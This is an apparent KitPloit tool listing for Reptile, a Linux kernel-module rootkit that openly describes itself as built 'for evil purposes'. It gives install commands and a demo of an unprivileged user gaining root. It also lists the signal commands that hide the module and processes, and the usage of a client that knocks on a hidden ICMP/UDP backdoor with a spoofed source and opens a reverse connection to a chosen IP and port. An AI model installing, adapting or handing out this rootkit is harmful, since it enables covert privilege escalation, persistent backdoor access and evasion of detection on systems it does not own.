ID KITPLOIT:3916133356306042352 Type kitploit Reporter KitPloit Modified 2017-10-30T15:36:18
Description
Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes .
Features
Give root to unprivileged users
Hide files and directories
Hide files contents
Hide processes
Hide himself
Boot persistence
Heaven's door - A ICMP/UDP port-knocking backdoor
Client to knock on heaven's door :D
Install
apt-get install linux-headers-$(uname -r)
https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install
Usage
Binaries will be copied to /reptile folder, that will be hidden by Reptile.
Getting root privileges
[email protected]:~$ id
uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner)
[email protected]:~$ /reptile/r00t
You got super powers!
[email protected]:/home/hax# id
uid=0(root) gid=0(root) groups=0(root)
Hiding
Hide/unhide reptile module: kill -50 0
Hide/unhide process: kill -49 <PID>
Hide files contents: all content between the tags will be hidden
Example:
<reptile>
content to hide
</reptile>
Knocking on heaven's door
Heaven's door is a ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:
Knock [Knock](<https://www.kitploit.com/search/label/Knock>) on Heaven's Door
Writen by: F0rb1dd3n
Usage: ./knock_on_heaven <args>
-x protocol (ICMP/UDP)
-s Source IP address (You can spoof)
-t Target IP address
-p Source Port
-q Target Port
-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
-l Launch listener
[!] ICMP doesn't need ports
ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l
UDP: ./knock_on_heaven -x udp -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l
Disclaimer
Some functions of this module is based on another rootkits. Please see the references!
